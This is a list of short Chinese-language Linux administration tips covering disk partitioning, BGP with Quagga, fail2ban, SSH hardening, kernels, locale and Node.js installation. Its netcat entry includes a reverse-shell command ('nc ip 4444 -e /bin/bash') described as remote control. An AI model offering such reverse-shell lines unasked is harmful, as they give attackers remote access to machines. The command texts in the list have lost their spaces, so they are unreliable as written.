-
fdisk不行是因为其默认使用MBR分区表,仅支持最大约2.2TB(2³²×512字节),超限后会截断或报错;gdisk和parted支持GPT,采用64位LBA寻址,无容量限制。
-
Quagga的zebra和bgpd必须按顺序启动:先systemctlstartzebra,再startbgpd,否则bgpd因无法连接zebra而退出;配置BGP需严格匹配对端AS号、显式声明address-familyipv4unicast并activate邻居,同时确保内核IP转发开启、反向路径过滤关闭,并通过抓包验证BGPOpen消息参数。
-
fail2ban需手动配置启用,关键在jail.local中设置enabled=true、正确logpath、ignoreip及findtime/maxretry匹配;验证必须用fail2ban-clientstatussshd和iptables检查,而非仅看systemctl状态。
-
最安全方式是将/etc/ssh/sshd_config中PermitRootLogin设为no并systemctlreloadsshd;须提前配置好带sudo权限的普通用户密钥登录,否则可能被锁。
-
大磁盘必须用GPT,parted是唯一可靠工具:先mklabelgpt,再1MiB对齐分区,扩容后需resizepart+partprobe+文件系统扩展,且须验证GPT备份。
-
掌握netcat需熟悉其五大功能:1、用“nc-vhostport”建立TCP/UDP连接并通信;2、通过“nc-l-pport”监听本地端口接收数据;3、结合重定向实现文件传输,如“nc-l-p9999>file”接收,“catfile|ncip9999”发送;4、使用“nc-z-vipport-range”扫描开放端口,支持TCP/UDP;5、执行“nc-l-p4444”监听并用“ncip4444-e/bin/bash”反弹shell,实现远程控制。
-
mount的作用是将独立的文件系统挂载到Linux根目录树的指定挂载点,使其可访问。它通过VFS层实现不同文件系统的统一管理,使用mount命令可手动挂载设备,配置/etc/fstab可实现开机自动挂载,确保数据安全与系统稳定。
-
CentOS7默认内核长期停留在3.10.x,因官方仓库仅随大版本更新小版本补丁(如3.10.0-1160→3.10.0-1234),不升级主线(3.x→4.x/5.x);需通过elrepo安装kernel-lt(长期支持版,推荐生产环境)或kernel-ml(主线稳定版),再设grub默认启动项并更新配置,最后验证并清理旧内核。
-
Linux系统抵御恶意软件的核心在于其权限隔离、开源透明及社区支持。保持系统更新、最小化安装、配置防火墙、强化用户权限管理、启用SELinux/AppArmor是关键步骤。此外,使用ClamAV、Lynis、Fail2ban等工具可增强防护。建立全面策略需结合纵深防御、最小权限原则、日志监控、备份恢复及安全培训,形成多层次、持续性的安全体系。
-
最可靠方式是执行uname-m,它直接输出内核识别的机器硬件名,如x86_64或aarch64,不依赖外部工具、不受容器或模拟环境干扰,结果准确且全系统通用。
-
curl是LinuxShell调用RESTAPI最简可行方案,需用-f校验HTTP状态码、jq解析JSON、环境变量管理凭据、设置超时参数确保稳定。
-
basename"$0"在脚本中常失效,因$0未标准化:遇空格不加引号会拆分、软链接返回链接名而非目标名、相对路径不解析;推荐用readlink-f"$0"或realpath"$0"归一化后再basename。
-
使用sudo运行命令时,确保用户属于sudo组,检查sudoers文件配置,并验证权限以避免错误。
-
Linux系统locale未正确配置会导致乱码、日期格式异常及中文识别失败,需依次查看当前设置、安装语言包、生成locale、临时设置会话语言、永久配置系统默认语言。
-
应直接安装Node.jsv22.17.1LTS(Porcelain),优先使用NodeSource官方源;多版本需求用nvm;无root权限时可手动解压二进制包并正确配置PATH与npmprefix。
